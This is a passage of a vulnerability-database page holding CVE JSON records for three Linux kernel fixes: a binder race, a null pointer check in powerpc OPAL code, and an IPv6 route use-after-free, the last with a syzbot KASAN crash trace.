"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.306",
"versionStartIncluding": "2.6.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "2.6.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "2.6.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "2.6.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "2.6.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "2.6.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "2.6.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "2.6.29",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbinder: fix race between mmput() and do_exit()\n\nTask A calls binder_update_page_range() to allocate and insert pages on\na remote address space from Task B. For this, Task A pins the remote mm\nvia mmget_not_zero() first. This can race with Task B do_exit() and the\nfinal mmput() refcount decrement will come from Task A.\n\n Task A | Task B\n ------------------+------------------\n mmget_not_zero() |\n | do_exit()\n | exit_mm()\n | mmput()\n mmput() |\n exit_mmap() |\n remove_vma() |\n fput() |\n\nIn this case, the work of ____fput() from Task B is queued up in Task A\nas TWA_RESUME. So in theory, Task A returns to userspace and the cleanup\nwork gets executed. However, Task A instead sleep, waiting for a reply\nfrom Task B that never comes (it\u0027s dead).\n\nThis means the binder_deferred_release() is blocked until an unrelated\nbinder event forces Task A to go back to userspace. All the associated\ndeath notifications will also be delayed until then.\n\nIn order to fix this use mmput_async() that will schedule the work in\nthe corresponding mm-\u003easync_put_work WQ instead of Task A."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:39:48.513Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/95b1d336b0642198b56836b89908d07b9a0c9608"
},
{
"url": "https://git.kernel.org/stable/c/252a2a5569eb9f8d16428872cc24dea1ac0bb097"
},
{
"url": "https://git.kernel.org/stable/c/7e7a0d86542b0ea903006d3f42f33c4f7ead6918"
},
{
"url": "https://git.kernel.org/stable/c/98fee5bee97ad47b527a997d5786410430d1f0e9"
},
{
"url": "https://git.kernel.org/stable/c/6696f76c32ff67fec26823fc2df46498e70d9bf3"
},
{
"url": "https://git.kernel.org/stable/c/67f16bf2cc1698fd50e01ee8a2becc5a8e6d3a3e"
},
{
"url": "https://git.kernel.org/stable/c/77d210e8db4d61d43b2d16df66b1ec46fad2ee01"
},
{
"url": "https://git.kernel.org/stable/c/9a9ab0d963621d9d12199df9817e66982582d5a5"
}
],
"title": "binder: fix race between mmput() and do_exit()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52609",
"datePublished": "2024-03-18T10:07:45.486Z",
"dateReserved": "2024-03-06T09:52:12.088Z",
"dateUpdated": "2025-05-04T07:39:48.513Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52686 (GCVE-0-2023-52686)
Vulnerability from cvelistv5
Published
2024-05-17 14:24
Modified
2025-05-04 07:41
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
powerpc/powernv: Add a null pointer check in opal_event_init()
kasprintf() returns a pointer to dynamically allocated memory
which can be NULL upon failure.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 2717a33d60745f2f72e521cdaedf79b00f66f8ca Version: 2717a33d60745f2f72e521cdaedf79b00f66f8ca Version: 2717a33d60745f2f72e521cdaedf79b00f66f8ca Version: 2717a33d60745f2f72e521cdaedf79b00f66f8ca Version: 2717a33d60745f2f72e521cdaedf79b00f66f8ca Version: 2717a33d60745f2f72e521cdaedf79b00f66f8ca Version: 2717a33d60745f2f72e521cdaedf79b00f66f8ca Version: 2717a33d60745f2f72e521cdaedf79b00f66f8ca |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:11:35.663Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8422d179cf46889c15ceff9ede48c5bfa4e7f0b4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e93d7cf4c1ddbcd846739e7ad849f955a4f18031"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e6ad05e3ae9c84c5a71d7bb2d44dc845ae7990cf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c0b111ea786ddcc8be0682612830796ece9436c7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9a523e1da6d88c2034f946adfa4f74b236c95ca9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a14c55eb461d630b836f80591d8caf1f74e62877"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e08c2e275fa1874de945b87093f925997722ee42"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8649829a1dd25199bbf557b2621cedb4bf9b3050"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52686",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:42:02.769590Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:19.230Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/powerpc/platforms/powernv/opal-irqchip.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8422d179cf46889c15ceff9ede48c5bfa4e7f0b4",
"status": "affected",
"version": "2717a33d60745f2f72e521cdaedf79b00f66f8ca",
"versionType": "git"
},
{
"lessThan": "e93d7cf4c1ddbcd846739e7ad849f955a4f18031",
"status": "affected",
"version": "2717a33d60745f2f72e521cdaedf79b00f66f8ca",
"versionType": "git"
},
{
"lessThan": "e6ad05e3ae9c84c5a71d7bb2d44dc845ae7990cf",
"status": "affected",
"version": "2717a33d60745f2f72e521cdaedf79b00f66f8ca",
"versionType": "git"
},
{
"lessThan": "c0b111ea786ddcc8be0682612830796ece9436c7",
"status": "affected",
"version": "2717a33d60745f2f72e521cdaedf79b00f66f8ca",
"versionType": "git"
},
{
"lessThan": "9a523e1da6d88c2034f946adfa4f74b236c95ca9",
"status": "affected",
"version": "2717a33d60745f2f72e521cdaedf79b00f66f8ca",
"versionType": "git"
},
{
"lessThan": "a14c55eb461d630b836f80591d8caf1f74e62877",
"status": "affected",
"version": "2717a33d60745f2f72e521cdaedf79b00f66f8ca",
"versionType": "git"
},
{
"lessThan": "e08c2e275fa1874de945b87093f925997722ee42",
"status": "affected",
"version": "2717a33d60745f2f72e521cdaedf79b00f66f8ca",
"versionType": "git"
},
{
"lessThan": "8649829a1dd25199bbf557b2621cedb4bf9b3050",
"status": "affected",
"version": "2717a33d60745f2f72e521cdaedf79b00f66f8ca",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/powerpc/platforms/powernv/opal-irqchip.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.11"
},
{
"lessThan": "4.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.306",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.306",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/powernv: Add a null pointer check in opal_event_init()\n\nkasprintf() returns a pointer to dynamically allocated memory\nwhich can be NULL upon failure."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:41:32.437Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8422d179cf46889c15ceff9ede48c5bfa4e7f0b4"
},
{
"url": "https://git.kernel.org/stable/c/e93d7cf4c1ddbcd846739e7ad849f955a4f18031"
},
{
"url": "https://git.kernel.org/stable/c/e6ad05e3ae9c84c5a71d7bb2d44dc845ae7990cf"
},
{
"url": "https://git.kernel.org/stable/c/c0b111ea786ddcc8be0682612830796ece9436c7"
},
{
"url": "https://git.kernel.org/stable/c/9a523e1da6d88c2034f946adfa4f74b236c95ca9"
},
{
"url": "https://git.kernel.org/stable/c/a14c55eb461d630b836f80591d8caf1f74e62877"
},
{
"url": "https://git.kernel.org/stable/c/e08c2e275fa1874de945b87093f925997722ee42"
},
{
"url": "https://git.kernel.org/stable/c/8649829a1dd25199bbf557b2621cedb4bf9b3050"
}
],
"title": "powerpc/powernv: Add a null pointer check in opal_event_init()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52686",
"datePublished": "2024-05-17T14:24:47.984Z",
"dateReserved": "2024-03-07T14:49:46.888Z",
"dateUpdated": "2025-05-04T07:41:32.437Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26852 (GCVE-0-2024-26852)
Vulnerability from cvelistv5
Published
2024-04-17 10:17
Modified
2025-05-04 08:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/ipv6: avoid possible UAF in ip6_route_mpath_notify()
syzbot found another use-after-free in ip6_route_mpath_notify() [1]
Commit f7225172f25a ("net/ipv6: prevent use after free in
ip6_route_mpath_notify") was not able to fix the root cause.
We need to defer the fib6_info_release() calls after
ip6_route_mpath_notify(), in the cleanup phase.
[1]
BUG: KASAN: slab-use-after-free in rt6_fill_node+0x1460/0x1ac0
Read of size 4 at addr ffff88809a07fc64 by task syz-executor.2/23037
CPU: 0 PID: 23037 Comm: syz-executor.2 Not tainted 6.8.0-rc4-syzkaller-01035-gea7f3cfaa588 #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/25/2024
Call Trace:
<TASK>
__dump_stack lib/dump_stack.c:88 [inline]
dump_stack_lvl+0x1e7/0x2e0 lib/dump_stack.c:106
print_address_description mm/kasan/report.c:377 [inline]
print_report+0x167/0x540 mm/kasan/report.c:488
kasan_report+0x142/0x180 mm/kasan/report.c:601
rt6_fill_node+0x1460/0x1ac0
inet6_rt_notify+0x13b/0x290 net/ipv6/route.c:6184
ip6_route_mpath_notify net/ipv6/route.c:5198 [inline]
ip6_route_multipath_add net/ipv6/route.c:5404 [inline]
inet6_rtm_newroute+0x1d0f/0x2300 net/ipv6/route.c:5517
rtnetlink_rcv_msg+0x885/0x1040 net/core/rtnetlink.c:6597
netlink_rcv_skb+0x1e3/0x430 net/netlink/af_netlink.c:2543
netlink_unicast_kernel net/netlink/af_netlink.c:1341 [inline]
netlink_unicast+0x7ea/0x980 net/netlink/af_netlink.c:1367
netlink_sendmsg+0xa3b/0xd70 net/netlink/af_netlink.c:1908
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg+0x221/0x270 net/socket.c:745
____sys_sendmsg+0x525/0x7d0 net/socket.c:2584
___sys_sendmsg net/socket.c:2638 [inline]
__sys_sendmsg+0x2b0/0x3a0 net/socket.c:2667
do_syscall_64+0xf9/0x240
entry_SYSCALL_64_after_hwframe+0x6f/0x77
RIP: 0033:0x7f73dd87dda9
Code: 28 00 00 00 75 05 48 83 c4 28 c3 e8 e1 20 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f73de6550c8 EFLAGS: 00000246 ORIG_RAX: 000000000000002e
RAX: ffffffffffffffda RBX: 00007f73dd9ac050 RCX: 00007f73dd87dda9
RDX: 0000000000000000 RSI: 0000000020000140 RDI: 0000000000000005
RBP: 00007f73dd8ca47a R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
R13: 000000000000006e R14: 00007f73dd9ac050 R15: 00007ffdbdeb7858
</TASK>
Allocated by task 23037:
kasan_save_stack mm/kasan/common.c:47 [inline]
kasan_save_track+0x3f/0x80 mm/kasan/common.c:68
poison_kmalloc_redzone mm/kasan/common.c:372 [inline]
__kasan_kmalloc+0x98/0xb0 mm/kasan/common.c:389
kasan_kmalloc include/linux/kasan.h:211 [inline]
__do_kmalloc_node mm/slub.c:3981 [inline]
__kmalloc+0x22e/0x490 mm/slub.c:3994
kmalloc include/linux/slab.h:594 [inline]
kzalloc include/linux/slab.h:711 [inline]
fib6_info_alloc+0x2e/0xf0 net/ipv6/ip6_fib.c:155
ip6_route_info_create+0x445/0x12b0 net/ipv6/route.c:3758
ip6_route_multipath_add net/ipv6/route.c:5298 [inline]
inet6_rtm_newroute+0x744/0x2300 net/ipv6/route.c:5517
rtnetlink_rcv_msg+0x885/0x1040 net/core/rtnetlink.c:6597
netlink_rcv_skb+0x1e3/0x430 net/netlink/af_netlink.c:2543
netlink_unicast_kernel net/netlink/af_netlink.c:1341 [inline]
netlink_unicast+0x7ea/0x980 net/netlink/af_netlink.c:1367
netlink_sendmsg+0xa3b/0xd70 net/netlink/af_netlink.c:1908
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg+0x221/0x270 net/socket.c:745
____sys_sendmsg+0x525/0x7d0 net/socket.c:2584
___sys_sendmsg net/socket.c:2638 [inline]
__sys_sendmsg+0x2b0/0x3a0 net/socket.c:2667
do_syscall_64+0xf9/0x240
entry_SYSCALL_64_after_hwframe+0x6f/0x77
Freed by task 16:
kasan_save_stack mm/kasan/common.c:47 [inline]
kasan_save_track+0x3f/0x80 mm/kasan/common.c:68
kasan_save_free_info+0x4e/0x60 mm/kasan/generic.c:640
poison_slab_object+0xa6/0xe0 m
---truncated---
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 3b1137fe74829e021f483756a648cbb87c8a1b4a Version: 3b1137fe74829e021f483756a648cbb87c8a1b4a Version: 3b1137fe74829e021f483756a648cbb87c8a1b4a Version: 3b1137fe74829e021f483756a648cbb87c8a1b4a Version: 3b1137fe74829e021f483756a648cbb87c8a1b4a Version: 3b1137fe74829e021f483756a648cbb87c8a1b4a Version: 3b1137fe74829e021f483756a648cbb87c8a1b4a Version: 3b1137fe74829e021f483756a648cbb87c8a1b4a |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.699Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/31ea5bcc7d4cd1423de6be327a2c034725704136"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/664f9c647260cc9d68b4e31d9899530d89dd045e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/79ce2e54cc0ae366f45516c00bf1b19aa43e9abe"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cae3303257950d03ffec2df4a45e836f10d26c24"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/394334fe2ae3b9f1e2332b873857e84cb28aac18"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ed883060c38721ed828061f6c0c30e5147326c9a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/61b34f73cdbdb8eaf9ea12e9e2eb3b29716c4dda"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/685f7d531264599b3f167f1e94bbd22f120e5fab"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "31ea5bcc7d4c",
"status": "affected",
"version": "3b1137fe7482",
"versionType": "custom"
},
{
"lessThan": "664f9c647260",
"status": "affected",
"version": "3b1137fe7482",
"versionType": "custom"
},
{
"lessThan": "79ce2e54cc0a",
"status": "affected",
"version": "3b1137fe7482",
"versionType": "custom"
},
{
"lessThan": "cae330325795",
"status": "affected",
"version": "3b1137fe7482",
"versionType": "custom"
},
{
"lessThan": "394334fe2ae3",
"status": "affected",
"version": "3b1137fe7482",
"versionType": "custom"
},
{
"lessThan": "ed883060c387",
"status": "affected",
"version": "3b1137fe7482",
"versionType": "custom"
},
{
"lessThan": "61b34f73cdbd",
"status": "affected",
"version": "3b1137fe7482",
"versionType": "custom"
},
{
"lessThan": "685f7d531264",
"status": "affected",
"version": "3b1137fe7482",
"versionType": "custom"
},
{
"status": "affected",
"version": "4.11"
},
{
"lessThan": "4.11",
"status": "unaffected",
"version": "0",
"versionType": "custom"
},
{
"lessThanOrEqual": "4.20",
"status": "unaffected",
"version": "4.19.310",
"versionType": "custom"
},
{
"lessThanOrEqual": "5.5",
"status": "unaffected",
"version": "5.4.272",
"versionType": "custom"
},
{
"lessThanOrEqual": "5.11",
"status": "unaffected",
"version": "5.10.213",
"versionType": "custom"
},
{
"lessThanOrEqual": "5.16",
"status": "unaffected",
"version": "5.15.152",
"versionType": "custom"
},
{
"lessThanOrEqual": "6.2",
"status": "unaffected",
"version": "6.1.82",
"versionType": "custom"
},
{
"lessThanOrEqual": "6.7",
"status": "unaffected",
"version": "6.6.22",
"versionType": "custom"
},
{
"lessThanOrEqual": "6.8",
"status": "unaffected",
"version": "6.7.10",
"versionType": "custom"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26852",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-19T20:41:29.771297Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-02-11T21:48:49.822Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv6/route.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "31ea5bcc7d4cd1423de6be327a2c034725704136",
"status": "affected",
"version": "3b1137fe74829e021f483756a648cbb87c8a1b4a",
"versionType": "git"
},
{
"lessThan": "664f9c647260cc9d68b4e31d9899530d89dd045e",
"status": "affected",
"version": "3b1137fe74829e021f483756a648cbb87c8a1b4a",
"versionType": "git"
},
{
"lessThan": "79ce2e54cc0ae366f45516c00bf1b19aa43e9abe",
"status": "affected",
"version": "3b1137fe74829e021f483756a648cbb87c8a1b4a",
"versionType": "git"
},
{
"lessThan": "cae3303257950d03ffec2df4a45e836f10d26c24",
"status": "affected",
"version": "3b1137fe74829e021f483756a648cbb87c8a1b4a",
"versionType": "git"
},
{
"lessThan": "394334fe2ae3b9f1e2332b873857e84cb28aac18",
"status": "affected",
"version": "3b1137fe74829e021f483756a648cbb87c8a1b4a",
"versionType": "git"
},
{
"lessThan": "ed883060c38721ed828061f6c0c30e5147326c9a",
"status": "affected",
"version": "3b1137fe74829e021f483756a648cbb87c8a1b4a",
"versionType": "git"
},
{
"lessThan": "61b34f73cdbdb8eaf9ea12e9e2eb3b29716c4dda",
"status": "affected",
"version": "3b1137fe74829e021f483756a648cbb87c8a1b4a",
"versionType": "git"
},
{
"lessThan": "685f7d531264599b3f167f1e94bbd22f120e5fab",
"status": "affected",
"version": "3b1137fe74829e021f483756a648cbb87c8a1b4a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv6/route.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.11"
},
{
"lessThan": "4.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.310",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.272",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.213",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.152",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.82",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.22",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.310",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.272",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.213",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.152",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.82",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.22",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.10",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/ipv6: avoid possible UAF in ip6_route_mpath_notify()\n\nsyzbot found another use-after-free in ip6_route_mpath_notify() [1]\n\nCommit f7225172f25a (\"net/ipv6: prevent use after free in\nip6_route_mpath_notify\") was not able to fix the root cause.\n\nWe need to defer the fib6_info_release() calls after\nip6_route_mpath_notify(), in the cleanup phase.\n\n[1]\nBUG: KASAN: slab-use-after-free in rt6_fill_node+0x1460/0x1ac0\nRead of size 4 at addr ffff88809a07fc64 by task syz-executor.2/23037\n\nCPU: 0 PID: 23037 Comm: syz-executor.2 Not tainted 6.8.0-rc4-syzkaller-01035-gea7f3cfaa588 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/25/2024\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x1e7/0x2e0 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:377 [inline]\n print_report+0x167/0x540 mm/kasan/report.c:488\n kasan_report+0x142/0x180 mm/kasan/report.c:601\n rt6_fill_node+0x1460/0x1ac0\n inet6_rt_notify+0x13b/0x290 net/ipv6/route.c:6184\n ip6_route_mpath_notify net/ipv6/route.c:5198 [inline]\n ip6_route_multipath_add net/ipv6/route.c:5404 [inline]\n inet6_rtm_newroute+0x1d0f/0x2300 net/ipv6/route.c:5517\n rtnetlink_rcv_msg+0x885/0x1040 net/core/rtnetlink.c:6597\n 